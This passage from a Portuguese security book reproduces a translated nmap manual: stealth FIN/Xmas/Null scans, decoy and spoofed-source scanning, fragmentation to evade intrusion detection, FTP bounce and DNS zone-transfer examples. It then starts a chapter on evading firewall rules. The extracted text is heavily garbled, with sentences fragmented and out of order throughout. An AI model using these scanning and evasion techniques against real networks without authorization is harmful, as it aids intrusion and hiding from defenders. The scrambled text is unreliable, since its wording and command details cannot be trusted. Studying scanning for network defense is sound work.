Modos Stealth FIN, Xmas Tree, ou Null scan: Algumas

e scan FIN utiliza o limitado pacote FIN como teste, enquanto

sS)

tagem desta técnica de scanning é que poucos sites irão registra-lá no arquivo de log. Desafortunada mente é necessário privilégios de super usuário (root) para construir estes pacotes SYN customiza dos. -sF -sX -sN vezes nem mesmo a técnica SYN scanning é clandes tina suficiente. Vários firewalls e filtros de pacotes observam por SYNs para portas restritas, e programas como Synlogger e Courtney estão disponíveis para detectar este tipo de scan. Por outro lado, scans avançados (stealth FIN, Xmas Tree, ou Null scan), podem ser capazes de passar através destes filtros sem serem molestados. A idéia é que portas fechadas são exigidas por responder aos pacotes de teste com um RST, enquanto portas abertas precisam ignorar os pacotes em questão (veja RFC 793 pp 64). A técnica d a técnica de scan Xmas Tree seta os flags FIN, URG e PUSH. A técnica de scan Null não seta nenhum flag. Desafortunadamente a Microsoft (como usual) decidiu completamente ignorar o padrão e faz as coisas do seu próprio jeito. Então este tipo de scan não funcionará contra sistemas executando Win dows95/NT. Do lado positivo, está é uma ótima maneira de distinguir entre duas plataformas. Se o scan encontrar portas abertas, é possível saber que a máquina não utiliza o Windows. Se as técnicas de scan -sF, -sX ou -sN mostram todas as portas fechadas, mesmo assim a técnica de scan SYN (- mostra portas sendo abertas, você poderá estar

Terrorismo Tecnológico Aprenda Para Sobreviver

224

olhando para uma máquina Windows. Esta é a maneira menos usada pelo nmap para testar a detecção do SO.

in

d

m, somente, descartar o pacote.

r

uina iva. A terceira técnica envolve o envio de

pacotes SYN e a espera pelo pacote com o flag RST or

a frente.

Note que o ping, por definição, é feito de qualquer

Exitem, também, alguns outros sistemas que são descobertos da mesma maneira que descobrimos o w dows. Estes incluem Cisco, BSDI, HP/UX, MVS, an IRIX. Todos acima enviam resets (RST) de portas abertas quando estes deve -sP Ping scanning: Algumas vezes você somente quer saber quais os hosts da rede estão ativos. O Nmap pode fazer isso enviando um pacote de requisição ICMP (ICMP echo request) para todo endereço IP especificado da rede. Os hosts que respondem estão vivos. Desafortunadamente, vários sites, como a microsoft.com, bloqueiam pacotes de requisição ICMP (echo request). Então, o nmap pode, também, envia um pacote ACK TCP para (por definição) a porta 80. Se nós pegarmos o flag RST novamente, a máq esta v ou os flags SYN/ACK. O método connect() é usado p usuários comuns (não root). Por definição (para super usuários), o nmap usa tanto as técnicas do ICMP e a do flag ACK em par alelo. Você pode mudar as -P opções descritas mais forma, e somente os hosts que respondem são scan neados. Somente use esta opção se você desejar vas culhar sem fazer qualquer scan real de portas. -sU

Terrorismo Tecnológico Aprenda Para Sobreviver

225

UDP scans: Este método é usado para determinar

)

m de a),

g é Eu, usualmente, lembro desta como uma

recente falha no rpcbind do Solaris. O Rpcbind pode r encontrado escondido em uma porta UDP não docu

mentada em algum lugar acima de 32770. Então não

ual inas

e

s,

sugestão da RFC 1812 (seção 4.3.2.8) de limitar a taxa de mensagens de erro

MP. Por exemplo, o núcleo do Linux (em net/ipv4/icmp.h) limita a geração de mensagens de

quais portas UDP (User Datagram Protocol, RFC 768 estão abertas no host. A técnica implica em enviar 0 bytes de dados de pacotes UDP para cada porta da máquina alvo. Se nós recebermos uma mensage ICMP port unreachable (porta ICMP não alcançad então a porta está fechada. Por outro lado nós assumimos que a porta está aberta. Várias pessoas pensam que a técnica UDP scannin supérfluo. se importa que a porta 111 esteja bloqueada por um firewall. Porém, você pode encontrar quais as por tas altas, maiores de 30.000, que estão no estado listening? Com o scanner UDP você pode! Existe, também, o programa cDc Back Orifice backdoor o q se oculta em uma porta UDP configurável em máqu Windows. Alguns serviços comumente vulneráveis qu utilizam o UDP são: snmp, tftp, NFS, etc. Desafortunadamente UDP scanning é algumas veze dolorosamente, vagarosa desde que a maioria dos hosts implementam a IC destination unreachable para 80 por 4 segundos, com 1/4 segundos de penalidade se esta for excedida. O Solaris tem um limite muito mais restrito (mais ou menos 2 mensagens por segundo) e assim gasta um tempo maior para realizar o scan. Nmap detecta esta taxa limitante e reduz conformemente, por outro lado inunda a rede com pacotes sem uso que

Terrorismo Tecnológico Aprenda Para Sobreviver

226

irão ser ignorados pela máquina alvo. Como é típico, a Microsoft ignorou a sugestão da RFC e não parece ter feito nenhuma taxa limitante por completo no Win95 e no NT. Então é possível scannear, rapidamente , todas as portas de 64K das

ws. Beleza!

-sO

a

s

sim

r

do

ável.

ado

sta pode ajudar a determinar quando um firewall é stateful ou somente um filtro de pacotes

máquinas windo Scan do Protocolo IP: Este método é usado para determinar quais protocolos IPs são usados no host. A técnica consiste em enviar pacotes IP raw sem promover nenhum cabeçalho para cada protocolo específico na máquina alvo. Se nós recebermos um mensagem do protocolo ICMP unreachable, então o protocolo não está sendo usado. Por outro lado nó assumimos que está aberto. Note que vários hosts (AIX, HP-UX, Digital UNIX) e firewalls podem não enviar mensagens de protocolo unreachable. As faz parecer que todos os protocolos estão "aber tos". Isso porque a técnica implementada é muito simila ao scanning da porta UDP, onde a taxa limite de ICMP pode ser aplicada também. Porém o campo protocolo IP tem somente 8 bits, então no máximo 256 protocolos podem ser testados, os quais devem ser possíveis de serem testados em tempo razo -sA ACK scan: Este método avançado é usualmente us para mapear o conjunto de regras de um firewall. Em particular, e simples que bloqueia pacotes SYN de chegada.

Terrorismo Tecnológico Aprenda Para Sobreviver

227

Este tipo de scan envia pacotes com o flag ACK setado para uma porta específica. Se um RST voltar,

"não filtradas", obtendo, assim, nenhuma porta mostrada na saída é usualmente um sinal que todos os testes foram

scedidos (e retornado RSTs). Esta técnica de scan nunca irá, obviamente, mostrar portas no estado

eto que as vezes pode ser possível detectar portas abertas mesmo sendo filtradas, isso

vido a anomalia do tamanho da janela TCP repor tado por vários sistemas operacionais. Sistemas

4 -UX, QNX,

com

e elas com comandos NULL de programas SunRPC

numa tentativa de determinar quando elas são portas C, e se são, qual programa e versão dos serviços.

Com este método você pode efetivamente obter a

a porta é classificada como "não filtrada". Se não voltar nada ou um ICMP unreachable voltar, a porta é classificada como "filtrada". Note que o nmap usualmente não imprime portas su "aberto". -sW Window scan: Este scan avançado é muito similar ao ACK scan, exc de vulneráveis para isso incluem no mínimo várias versões do AIX, Amiga, BeOS, BSDI, Cray, Tru6 UNIX, DG/UX, OpenVMS, Digital UNIX, FreeBSD, HP OS/2, IRIX, MacOS, NetBSD, OpenBSD, OpenStep, Rhapsody, SunOS 4.X, Ultrix, VAX, and VxWorks. Vejam no arquivo, na lista de discussão nmap-hack ers, a lista completa. -sR RPC scan. Este método trabalha em combinação várias técnicas de scan de portas do Nmap. Ele pega todas as portas TCP/UDP encontradas abertas inunda RP

Terrorismo Tecnológico Aprenda Para Sobreviver

228

mesma informação como se usasse 'rpcinfo -p' mesmo se o portmapper alvo estiver atrás de um firewall (ou protegido pelo TCP wrappers). Decoy não tra balha correntemente com RPC scan, em algum ponto eu posso adicionar o suporte decoy para UDP RPC scans.

-b <ftp relay host>

RFC foi escrita. Porém na internet hoje, nós não odemos ter pessoas hijacking servidores ftp e req

uisitando que os dados sejam jogados para *

s es, preenchendo discos, tentando saltar

firewalls, e geralmente sendo aborrecido, ficando, assim, difícil seguir a pista ao mesmo tempo." O que nós iremos explorar disto é o scan de portas TCP do servidor "proxy" de ftp. Então você pode

onectar a um servidor ftp atrás do firewall, e então scannear portas que estão mais provávelmente

FTP bounce attack: Uma interessante "carac terística" do protocolo ftp (RFC 959) é sustentada para conexões ftp "proxy". Em outras palavras, eu devo ser capaz de conectar do evil.com para um servidor FTP, target.com, e requerer que o servidor envie um arquivo para qualquer lugar na internet! Isto pode ter sido explorado bem em 1985 quando a p arbitrários pontos na internet. Como *Hobbit escreveu em 1995, este protocolo torna inútil "pode ser usado para portar virtualmente não deter mináveis emails ou news, forjando em servidore vários sit c bloqueadas (139 é uma boa). Se o servidor ftp per mitir ler de e escrever para algum diretório (como /incoming), você pode enviar dados arbitrários para portas que você achar abertas (nmap não faz isso por você). Os argumentos passados para a opção 'b' é o host

Terrorismo Tecnológico Aprenda Para Sobreviver

229

que você quer usar como proxy, na notação de padrão :port.

opcional. Para determinar quais servidores são vulneráveis para este ataque,

eá-los. Isto permite scannear as redes que não permitem ICMP echo

g

(ou para uma simples máquina) e então esperamos por respostas. Hosts que estão ativos devem responder com um RST. Esta opção preserva a eficiência de somente scannear hosts que estão ativos, enquanto

ainda permite scannear redes/hosts que bloquearam pacotes ping. Para usuários não root, é usado o

URL. O formato é: username:password@server Tudo, menos o server é você pode ver meu artigo em Phrack 51. A versão atualizada está disponível em nmap URL (http://www.insecure.org/nmap). -P0 Pinga os hosts antes de scann requests (ou responses) através dos seus firewalls. microsoft.com é um exemplo desta rede, e então você deve sempre usar -P0 ou -PT80 quando portscannin microsoft.com. -PT Use TCP "ping" para determinar quais hosts estão ativos. Ao invez de enviar pacotes ICMP echo request e esperar pelas respostas, nós enviamos pacotes TCP ACK por toda parte na rede alvo connect(). Para setar a porta destino dos pacotes de teste usem -PT<número da porta>. A porta default é 80, desde que está porta é muitas vezes não fil trada. -PS

Terrorismo Tecnológico Aprenda Para Sobreviver

230

Está opção usa pacotes com SYN (connection request) ao invez de pacotes com ACK para usuários root. Hosts que estão ativos devem responder com RST (ou,

Está opção usa um pacote ping verdadeiro (ICMP echo equest). Esta encontra os hosts que estão ativos e

também procura por um endereço de broadcast para a

rede ados se

es m).

) e pacotes ICMP ( -PI ) ocê pode obter

Esta opção ativa a identificação de hosts remotos ia TCP/IP fingerprinting. Em outras palavras, ela

usa uma grande quantidade de técnicas para detectar

s

raramente, um SYN|ACK). -PI r subrede da sua rede. Estes são endereços IPs que são externamente alcançáveis e traduzidos para broadcast de pacotes IP de chegada para uma sub de computadores. Estes devem ser elimin encontrado, como ele permitem por númerosos ataqu de negação de serviço (DoS) (Smurf é o mais comu -PB Este é o tipo de ping default. Ele usa tanto pacotes com ACK ( -PT sweeps em paralelo. Desta maneira v os firewalls que filtram cada uma (porém não ambas). -O v sutilezas na pilha de rede do sistema operacional do computador que você está scanneando. Ele usa estas informações para criar a 'fingerprint' a qual é comparada com sua base de dados de conhecido

Terrorismo Tecnológico Aprenda Para Sobreviver

231

fingerprints de SOs (o arquivo nmap-os-finger prints) para decidir qual o tipo de sistema que você está escanneando.

Se o Nmap está desabilitado para resolver o SO da a

ndo executado na máquina. Por fazer isso você contribui para o conjunto de sis

conhecidos pelo nmap e então erá mais correto para todos.

ual a dificuldade em

estabelecer uma conexão TCP forjada contra um host útil para explorar o IP de origem

aseado na relação de confiança (rlogin, firewall filters, etc) ou por esconder a origem do ataque. O

em

nning do ident reverso TCP. Como notado por Dave Goldsmith em 1996 na mensagem para

ocolo ident (rfc 1413) permite evelar o username dos donos dos processos conecta

dos via TCP, mesmo se estes processos não iniciaram

máquina, e as condições são boas (ex. ao menos um porta aberta), Nmap irá prover a URL que você pode usar para submeter a fingerprint se você conhecer (com certeza) o SO se temas operacionais s A opção -O também possibilita classificar e fazer o prognostico da sequência TCP. Esta é uma medida que descreve aproximadamente q remoto. Esta é b número difficulty mostrado é baseado em uma simples amostra estatística e pode variar. Este número é geralmente melhor apresentado como uma frase Inglês como "worthy challenge" ou "trivial joke". -I Esta ativa o sca a Bugtraq, o prot r a conexão. Então você pode, por exemplo, conectar a porta http e então usar o identd para encontrar

Terrorismo Tecnológico Aprenda Para Sobreviver

232

quando o servidor está sendo executado como root. P

s

o, e outros aborrecimentos para detectar o que você está

uidadoso com isso! Vários programas tem preocupações lidando com estes cuidadosos

pacotes. Enquanto este método não obtem pacotes

ão conseguem asse gurar o golpe de performance que este fato causa, então é melhor deixar este desabilitado.

ote que esta opção, ainda, não esta funcionando em todos os sistemas. Esta funciona bem para o Linux,

o

tecendo. Você pode usá-la duas vezes para um melhor efeito. Use -d em conjunto se você realmente

Isto pode somente ser feito com uma conexão TC completa para a porta alvo (ex.: a opção de scan ning -sT). Quando -I é usada, o identd do host remoto é pesquisado para cada porta aberta encon trada. Obviamente isso não funciona se o host não estiver rodando o identd. -f Esta opção requere os flags SYN, FIN, XMAS, ou NULL scan para usar cuidadosos pacotes IP fragmentados. A idéia é dividir o cabeçalho TCP sobre vário pacotes para ficar difícil para o filtro de pacotes, sistemas de detecção de intrusã fazendo. Seja c filtrados e firewalls que enfileram todos os frag mentos IP (como a opção CONFIG_IP_ALWAYS_DEFRAG no kernel do linux), várias redes n N FreeBSD, e OpenBSD e outras pessoas tem reportad sucessos com outras variações *NIX. -v Modo Verbose. Esta é uma opção altamente recomen dada e fornece mais informações sobre o que esta acon

Terrorismo Tecnológico Aprenda Para Sobreviver

233

quiser ficar louco com a quantidade de informações a tela!

ocê

ste log mostra o resultado do seu scan em uma forma humanamente legível no arquivo que você

ento. cilmente capturar e

interpretar os resultados do Nmap. Você pode fornecer o argumento ´-´(sem quotas) para colocar

t (para shell pipelines, etc). Neste aso uma saída normal será suprimida. Tomar cuidado

para as mensagem de erro se você esta usando esta

u

n -h Esta cômoda opção mostra uma rápida tela de referência das opções usadas no nmap. Como v deve ter notado, está man page não é exatamente uma 'rápida referência' :o) -oN <logfilename> E especificou como argumento. -oX <logfilename> Este log mostra o resultado do seu scan na forma de XML no arquivo que você especificou como argum Isto permite aos programas fa em uma stdou c (elas, ainda, irão para stderr). Também, note que ´-v´ pode causar algumas informações extras para ser impressas. -oG <logfilename> Este log mostra o resultado do seu scan na forma do grepable no arquivo que você especificou como arg

Terrorismo Tecnológico Aprenda Para Sobreviver

234

mento. Este simples formato provê todas as informações em uma linha (então você pode facil

a portas ou obter informações e SOs e ver todos os endereços IPs). Este é o

mecanismo preferido pelos programas para interagir da

r

shell pipelines, etc). Neste caso uma saída normal será suprimida. Tomar

de erro se você esta sando esta (elas, ainda, irão para stderr).

Também, note que ´-v´ irá fornecer várias

--resume <logfilename>

. oi

scanneada com sucesso e armazenada no arquivo de

mente usar o grep par d com o Nmap, porém agora é recomendado usar a saí em XML (-oX). Este simples formato pode não conte tantas informações quanto os outros formatos. Você pode fornecer o argumento ´-´(sem quotas) para colocar em uma stdout (para cuidado para as mensagem u informações extras para ser impressas. -oS <logfilename> thIs l0gz th3 r3suLtS of YouR ScanZ iN a s|<ipT kiDd|3 f0rM iNto THe fiL3 U sPecfy 4s an arGuMEnT! U kAn gIv3 the 4rgument ´-´ (wItHOUt qUOteZ) to sh00t output iNT0 stDouT!@!! O scan de rede que é cancelado devido a um control- C, interrupção da rede, etc. pode ser resumido usando esta opção. O logfilename precisa ser normal (-oN) ou parsable na máquina (-oM) para registrar o scan abortado. Nenhuma outra opção pode ser usada Nmap começará na máquina depois que a última f log.

Terrorismo Tecnológico Aprenda Para Sobreviver

235

-iL <inputfilename> É feita a leitura de um arquivo alvo especificado na linha de comando. O arquivo deve conter uma lista de hosts ou expressões de rede separados por espaços, tabs, ou novas linhas. Use o hífen (-)

e

ntediado, tente nmap -sS -iR -p 80 para encontrar vários

r todas as portas entre 1 e 1024 tão bem

quanto qualquer porta listada no arquivo de l vem com o nmap. Para o scan de pro

ocolos IP (-sO), especifica o número do protocolo

como inputfilename se você quisesse que o nmap leia expressões do hosts de stdin (como no final do pipe). Veja a seção especificação do alvo para maiores informações nas expressões que você preencherá no arquivo. -iR Esta opção fala para o Nmap para gerar seus próprios hosts para scannear, usando simplesment números randomicos :o). Isso nunca irá terminar. Isso pode ser muito útil para tirar amostras estatísticas da internet para estimar várias coisas. Se você nunca estiver realmente e servidores web para observar. -p <port ranges> Esta opção especifica quais portas você quer para descrever. Por exemplo '-p 23' irá tentar somente a porta 23 do host(s) alvo. ´-p 20-30,139,60000-´ irá scannear portas entre 20 e 30, porta 139, e todas as portas maiores que 60000. Por definição é para scannea serviços o qua t

Terrorismo Tecnológico Aprenda Para Sobreviver

236

que você deseja para (0-255).

mente deseja scannear por portas catalogadas no arquivo services o qual vem

o decoys estão scanneando a rede alvo também. Então seus IDS precisarão repor

an de portas de um único endereço IP, orém eles não saberão qual o endereço IP que os

estava scanneando e quais eram os decoys inocentes. a

efetiva para esconder seu endereço IP.

eparando cada decoy host com vírgulas, você pode usar opcionalmente 'ME' como um dos decoys para

ta

-F Modo de scan rápido. Especifica que você so com o nmap (ou o arquivo de protocolos para -sO). Este é obviamente muito mais rápido do que scannear todas 65535 portas no host. -D <decoy1 [,decoy2][,ME],...> O processo de decoy scan será executado fazendo ele mostrar-se para o host remoto que o(s) host(s) que você especificou com tar 5-10 sc p Enquanto isto pode ser descoberto através de um rota, respostas soltas, e outras mecanismos ativos, este é geralmente uma técnica extremamente S representar a posição que você quer seu endereço IP para ser usado. Se você colocar 'ME' na sex posição ou outra maior, várias detectores comuns de scan de portas não serão razoáveis para mostrar seu endereço IP por completo. Se você não usar 'ME', o nmap irá colocar você em uma posição randomica. Note que os hosts que você usa como decoys devem estar ativos ou você precisará acidentalmente inun

Terrorismo Tecnológico Aprenda Para Sobreviver

237

dar com pacotes SYN seu alvo. Também, ele será muito fácil para determinar quais hosts estão scan neando se somente um está atualmente ativo na rede.

e

Também, note que vários (estúpidos) "detectores de

o canneando com a máquina

decoy que você esta usando. Isto pode causar aiores problemas para a máquina alvo se o decoy

está sendo usado, digo, seu internet gateway ou até

istória é que os detectores de scan de portas spoofable não devem

tra a máquina que parece estar scanneando suas portas. Este pode ser somente um

decoy, ou seja, uma isca, uma armadilha!

-O

registrador que usa vários decoys ue podem atrasar seu scan e potencialmente até

fazer este menos preciso. Também, vários ISPs fil

Você deverá querer usar o endereço IP ao invez d nomes (então redes decoy não irão ver você em seus nameserver logs). scan de portas" irão firewall/deny roteamento para hosts que tentam fazer o scan de portas. Então você precisa descuidadosamente causar a perda de conexã da máquina que você está s m "localhost". Então você pode querer ser cuidadoso com esta opção. A real moral da h gastar ações con Decoys são usados tanto em ping scan inicial (usando ICMP, SYN, ACK, ou o que seja) e durante a fase de atual scanneamento de porta. Decoy são também usados durante a detecção remota de SO ( ). Este é um digno q tram pacotes spoofed, embora vários (correntemente a maioria) não restrigem pacotes IP spoofed por inteiro. -S <IP_Address>

Terrorismo Tecnológico Aprenda Para Sobreviver

238

Em várias circunstâncias, nmap pode não ser capaz

e determinar seu endereço de origem ( nmap irá avisá-lo se este é o caso). Nesta situação, use -S

n te

so

somente que isso levanta uma interessante discussão, em que as pessoas devem estar cientes

antes que elas acusem outras pessoas de estar scan

ara este tipo de uso.

n

s

as ê

d com seu endereço IP (através da interface que você deseja enviar pacotes). Outro possível uso deste flag é para spoofar o scan para fazer o alvo pensar que alguém mais está sca neando. Imagine uma companhia sendo repetidamen port scanned pelo seu competidor! Este não é um u suportado (ou o principal propósito) deste flag. Eu penso neando suas portas. -e geralmente será requerida p -e <interface> Fala para o nmap qual interface enviar e receber pacotes. Nmap deve ser capaz de detectar isto, porém este contará para você se não puder. -g <portnumber> Conjunto de números de portas de origens usadas no scan. Vários ingênuos firewalls e filtros de pacotes instalados fazem uma exceção em seus co juntos de regras para permitir pacotes DNS (53) ou FTP-DATA (20) para entrar e estabelecer a conexão. Obviamente isto contesta completamente as vantagen de segurança do firewall desde que intrusos podem somente mascarar como FTP ou DNS por modificar su portas de origem. Obviamente para UDP scan voc

Terrorismo Tecnológico Aprenda Para Sobreviver

239

deve tentar 53 primeiro e TCP scans devem tentar 20

sta

o

o informações úteis no número da porta de origem.

ts

ala para o Nmap para embaralhar cada grupo acima de 2048 hosts antes de scanneá-los. Isto pode fazer

na

antes da porta 53. Note que isso é somente uma req uisição -- nmap honrará isso somente quando e estiver hábil para. Por exemplo, você não pode amostrar todo TCP ISN de um host:porta para um host:porta, então nmap muda a porta de origem mesm que seja usado -g. Seja ciente que existe uma penalidade na perfor mance em vários scans por usar esta opção, porque eu algumas vezes armazen -r Fala para o Nmap para não randomizar a ordem na qual as portas serão scanneada. --randomize_hos F o scan menos evidente para vários sistemas de moni toração de rede, especialmente quando você combi estes com as opções de baixo tempo (slow timing) (veja abaixo). -M <max sockets> Conjunto máximo de números de sockets que será usado em paralelo pelo TCP connect() scan (por definição). Esta é útil para diminuir um pouco o scan e anular a possibilidade de travar a máquina remota. Outra aproximação é para usar -sS, a qual é geralmente fácil para as máquinas descreverem.

Terrorismo Tecnológico Aprenda Para Sobreviver

240

OPÇÕES DE TEMPO

eralmente o Nmap faz um bom trabalho em ajustar para as características da rede um tempo de

sível m

bjetivos. As seguintes opções

provêem um fino nível de controle sobre o tempo de

p. Paranoid modo de scan muito lento na esperança de prevenir a detecção pelo sistema IDS.

Este serializa todos os scans (scanning não par no mínimo 5 minutos

ntre o envio de pacotes. Sneaky é similar, exceto que somente espera 15 segundos entre o envio de

o

default do Nmap, o qual tenta executar tão rápido quanto possível sem sobrecarregar a rede ou perder

timeout de 5 minutos por host e nunca espera mais

não se importa em perder algumas

G execução e scanning tão rápido quanto pos enquanto minimiza as chances do hosts/portas sere não detectadas. Entretanto, existem vários casos onde a política de tempo default do Nmap pode não encontrar seus o scan: -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> Estas são políticas de tempo preservados para con venientemente expressar suas prioridades para o Nma alelo) e geralmente espera e pacotes. Polite tem o significado para facilitar a carga na rede e reduzir as chances de travar a máquina. Ele serializa os testes e espera no mínim 0.4 segundos entre eles. Normal é o comportamento hosts/portas. Aggressive esse modo adiciona um que 1.25 segundos para testar as respostas. Insane é somente adequando para redes muito rápidas ou onde você

Terrorismo Tecnológico Aprenda Para Sobreviver

241

informações. Nesta opção o timeout dos hosts acon tecem em 75 segundos e espera somente 0.3 segundos

, de qualquer forma, uma varredura extremamente rápida na rede

er

idos abaixo.

ost_timeout <milliseconds>

Especifica a soma máxima de tempo do Nmap tem per antes de

retransmitir ou ocorrer um timeout de um particular

tempo que o usual. Com este parâmetro você pode garantir que o

por teste individual. Esta possibilita :o). Você pode também referenciar isso por números (0-5). Por exemplo, ´-T 0´ fornece para você o modo Paranoid e ´-T 5´ é o modo Insane. Estes modos, para preservar o tempo, NÃO devem s usados em combinação com controles de baixo nível, como os fornec --h Especifica a soma de tempo que o Nmap permite para gastar scanneando um simples host antes de desistir daquele IP. O modo de tempo default não tem o time out do host. --max_rtt_timeout <milliseconds> mitido para esperar pela resposta de teste teste. O modo default seta este valor em 9000. --min_rtt_timeout <milliseconds> Quando um host alvo começa a estabelecer um padrão de resposta muito rápido, Nmap irá contrair a soma de tempo fornecida por teste. Isto aumenta a velocidade do scan, porém pode levar a perder pacotes quando a resposta gasta mais

Terrorismo Tecnológico Aprenda Para Sobreviver

242

Nmap irá esperar ao menos a soma de tempo fornecida antes de abrir mão do teste.

--initial_rtt_timeout <milliseconds>

r boas estima

tivas RTT do ping e dos primeiros testes. O modo default usa 6000. --max_parallelism <number> Especifica o número máximo de Nmap scans permitidos para serem pe stando este para 1 significa que o Nmap nunca irá tentar scann

diminuir a man var-se do IDS. nmap -v target.example.com Esta opção faz o scan de todas as portas TCP reservadas na máquina target.example.com. A opção -v significa ligar o modo verbose.

Especifica o timeout do teste inicial. Isto é geralmente útil quando scanning firewalled hosts com -P0. Normalmente o Nmap pode obte

rformados em paralelo. Aju

ear mais que uma porta por vez. Este, também, afeta outros scans paralelos como o ping sweep, RPC scan,

etc.

--scan_delay <milliseconds>

Especifica a mínima soma de tempo que o Nmap pre cisa esperar entre testes. Este é, na maioria das vezes, útil para reduzir a carga da rede ou para

eira de scan para esqui

Terrorismo Tecnológico Aprenda Para Sobreviver

243

nmap -sS -O target.example.com/24 Lança um stealth SYN scan contra cada máquina que está ativa, abrangendo todas as 255 máquinas de classe 'C' onde target.example.com reside. Este exemplo, também, tenta executando em cada host que esta ativo. Este requere privilégios de root (super usuário) por causa da técnica SYN scan e da detecção de SOs. nmap -sX -p 22,53,110,143,4564 198.116.*.1-127 Envia um Xmas tree scan para a primeira metade de cada uma das 255 possibilidades de subredes de 8 bit no espaço de endereços classe 'B' em 198.116. Nós estamos testando quando o sistema executa sshd, DNS, pop3d, imapd, ou a porta 4564. Note que o Xmas scan não trabalha com a Microsoft devido a sua deficiente pilha TCP. O mesmo acon tece com CISCO, IRIX, HP/UX, e BSDI. nmap -v --randomize_hosts -p 80 '*.*.2.3-5' Em lugar de focar somente um específico IP, é interes sante, algumas vezes, abranger um fatia de toda a internet e fazer o scan de um pequena amostra de cada fatia. Este comando encontra todos os servidores web em máquinas com endereços IPs terminando em .2.3, .2.4, ou .2.5. Se você é super usuário (root) você pode adicionar -sS. Também, você irá encontrar mais máquinas interessantes começando com 127., então você pode querer usar '127-222' ao invez dos primeiros asterísticos porque essa parte tem uma alta den sidade de máquinas interessantes (IMHO).

determinar o sistema operacional que esta

Terrorismo Tecnológico Aprenda Para Sobreviver

244

host -l company.com | cut '-d ' -f 4 | ./nmap -v -iL - Fazer uma transferência de zona de DNS para encontrar hosts em company.com e então alimentar os endereços IPs para o nmap. Os comandos acima são para minha caixa

GNU/Linux. Você pode precisar de diferentes coman dos/opções em outros sistemas operacionais.

Cuidado com testes!

administradores, donos de empresas e empregados e até u

sistema ficam com a falsa impressão de segurança. Isto é muito perigoso, pois alguns minutos depois de ter sido feito o teste, al m

Muitossuários domésticos, após terem feitos testes no seu

gu funcionário pode ter, por exemplo, recebido um e-mail e este, que estava infectado, abriu uma porta do sistema.

Claro que os testes devem ser utilizados porém muito cuidado, pois absolutamente não são motivos para

despreocupação e sim somente mais uma arma que deve ser utilizada para continuar a manutenção de segurança, que deve

ser continua sempre!

Terrorismo Tecnológico Aprenda Para Sobreviver

245

Capítulo XIV FireWalls – Funcionamento, e como burlar.

Terrorismo Tecnológico Aprenda Para Sobreviver

246

14.1 Introdução Firewalls são mecanismos utilizados para aumentar a segurança

de redes ligadas a Internet, espécies de barreira de proteção, constituí

e duas redes geralmente entre a rede l

o. Alguns firewalls dão maior ênfase ao bloqueio de tráfego, enquanto outros enfatizam a permissão do tráfego, o importante é configurá-l de acordo com a política de segurança da organiza elecendo o tipo de acesso que deve ser pe

ede interna), que é en

endecontrole de acesso, om base nas má

das de um conjunto de hardware e software. Ele cria como se fosse um muro com buracos, e dependendo do tipo de dados que chega até ele deixa passar para dentro ou fora da rede ou o destrói.

Firewall é um sistema ou um grupo de sistemas que garante uma política de controle de acesso entr

ocal e Internet, mas pode ser usado também para Rede local X Rede local. Em princípio firewalls podem ser vistos como um par de mecanismos: um que existe para bloquear o tráfego e outro que existe para permitir o tráfeg

oção que o utiliza, estabrmitido ou negado.

14.2 Podem funcionar da seguinte forma: Os filtros de pacotes utilizam endereços IP de origem e de

destino, e portas UDP e TCP para tomar decisões de controle de acesso. O administrador elabora uma lista de máquinas e serviços que estão autorizados a transmitir datagramas nos possíveis sentidos de transmissão (entrado ou saindo da r

tão usada para filtrar os datagramas IP que tentam atravessar o firewall. Um exemplo de política de filtragem de pacotes seria permitir o tráfego de datagramas carregando mensagens de HTML e DNS nas duas direções, tráfego Telnet só para pacotes saindo da rede interna e impedir todos os outros tipos de tráfego.

A filtragem de pacotes é vulnerável a adulteração dereços IP e não fornece uma granularidade muito fina de

já que o acesso é controlado cquinas de origem e de destino dos datagramas.

Terrorismo Tecnológico Aprenda Para Sobreviver

247

Na segunda categoria de firewalls, um gateway de circuitos atua como intermediário de conexões TCP, funcionando como um TCP modificado. Para transmitir dados, o usuário origem conecta-se a uma porta TCP no gateway, que por sua vez, conecta-se ao usuário destino usando outra conexão TCP. Para que seja estabelecido um circuito o usuário de origem deve fazer uma solicitação para o gateway no firewall, passando como parâmetros a máquina e o serviço de destino. O gateway então estabelece ou não o circuito, note que um mecanismo de autenticação pode ser implementado neste protocolo.

Firewalls onde os gateways atuam em nível de aplicação utilizam implementações especiais das aplicações desenvolvidas especificamente para funcionar de forma segura. Devido a grande flexibilidade desta abordagem ela é a que pode fornecer maior grau de

um único host de acesso externo (bastion host). Além disso, a aplicação FTP pode ser modificada para limitar a tra

Isto é conseguirmos ter algum acesso que, a princípio, não seria permitido pelo firewall.com a instalação foram feitas regras para impedir o acesso a determinadas portas e serviços, mas estas regras não foram suficientes para isto e foi possível contornar a negação do serviço.

Um exemplo notável: em um firewall, colocaram-se regras para impedir o acesso dos usuários da rede interna ao Internet Relay Chat (IRC), um serviço de bate-papo. Basicamente, fecharam-se as portas definidas para este serviço - de 6667 a 7000. No entanto, um

proteção. Por exemplo, um gateway FTP pode ser programado para restringir as operações de transferência a arquivos fisicamente localizados em

nsferência de arquivos da rede interna para a externa, dificultando ataques internos.

14.3 Evasão de Firewall

Terrorismo Tecnológico Aprenda Para Sobreviver

248

dos usuários descobriu um servidor de IRC que também permite conexões pela porta 6660, não impedida pelo firewall, e, configurando o cliente deste serviço para esta porta, conseguiu evadir-se das regras do firewall.

Então o que acontece é que mesmo um firewall impedindo um determinado tipo de acesso como, por exemplo, paginas pornográficas, é possível mesmo assim acessá-las e é nisso que consiste a evasão.

Estarei mostrando aqui como fazer isso se você estiver dentro da rede isto é de dentro para fora e não de fora para dentro, porém é possível e muito parecido.

14.4 Como fazer?

O Firewall é uma barreira baseada em regras e digamos que o administrador colocou as seguintes: “impeça o acesso a todos os sites que têm a palavra 'sexo' no meio”; ou “proíba todo acesso, menos os acessos HTTP que passarem pelo proxy filtrador de con é meio complicado, mas é mais fácil enganá-las e fazer com que o con

esunção, isto é, acessando algum servidor de IRC previamente preparado que escute por outra porta, estaremos burlando esta regra e usando o bate papo do mesmo jeito!

Todo firewall pod nos um tipo de

teúdo sexo”. Destruir essas regras estabelecidas

teúdo se encaixe no que o firewall permite!

Então um IRC (bate-papo) - que responde a porta 6667, quebrando esta pr

e ser enganado, pois pelo meserviço ele tem que oferecer.

Deve-se fazer com que firewall imagine que está oferecendo um serviço quando na verdade está oferecendo outro. No entanto,

Terrorismo Tecnológico Aprenda Para Sobreviver

249

temos q ll: o ponto em qu ele sai do firewall para o mundo extexterno para o firewall e o ponto em que ele volta do firewall para o nosso computador. e para cada um destes pontos, possivelmente, pre

nosso dado para seu

